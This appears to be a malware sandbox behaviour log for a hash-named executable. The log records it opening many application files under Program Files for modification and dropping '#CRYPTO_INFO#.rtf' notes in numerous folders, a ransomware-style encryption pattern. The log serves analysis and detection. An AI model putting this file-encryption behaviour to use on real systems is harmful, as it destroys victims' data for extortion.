8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\EnterUnregister.asx 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\scan_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_unshare_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ta.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\psfontj2d.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\logging.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\file_info2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_sv.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.services_1.1.0.v20140328-1925.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\dd_arrow_small2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\InstallRead.mhtml 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\fonts\TwemojiMozilla.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\go-mobile.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adc_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\JSByteCodeWin.bin 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\nb.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ko.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Update\Install\{1DD96F7A-AD33-4336-A298-2296283FF9BE}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\faf_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\files_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-ui.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jdb.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\adobepdf.xdc 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\svgCheckboxSelected.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\ResetRepair.vstm 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\manifest.json 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_selected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\invalid32x32.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right-pressed.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\icudt26l.dat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\splash.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoDev.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\shortcuts_log.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\example_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif 